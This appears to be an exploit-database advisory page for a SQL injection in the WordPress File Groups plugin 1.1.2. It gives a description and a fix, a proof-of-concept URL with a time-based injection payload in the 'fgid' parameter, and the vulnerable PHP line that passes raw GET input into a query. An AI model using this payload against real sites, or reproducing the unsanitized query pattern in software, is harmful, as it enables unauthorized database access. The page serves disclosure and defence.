header-logo
Suggest Exploit
vendor:
File Groups
by:
Miroslav Stampar
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: File Groups
Affected Version From: 1.1.2002
Affected Version To: 1.1.2002
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:file_groups
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in 'fgid' parameter of 'download.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to bypass certain security restrictions, access or modify data, or exploit various vulnerabilities in the underlying database.

Mitigation:

Update to version 1.1.3 or later.
Source

Exploit-DB raw data:

# Exploit Title: WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip
# Version: 1.1.2 (tested)

---
PoC
---
http://localhost/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121)))

---------------
Vulnerable code
---------------
$fgid = $_GET['fgid'];

...

$file_list = $wpdb->get_col("select guid from wp_posts where post_parent = $fgid");

Navigation

Suggest Exploit

Services By CQR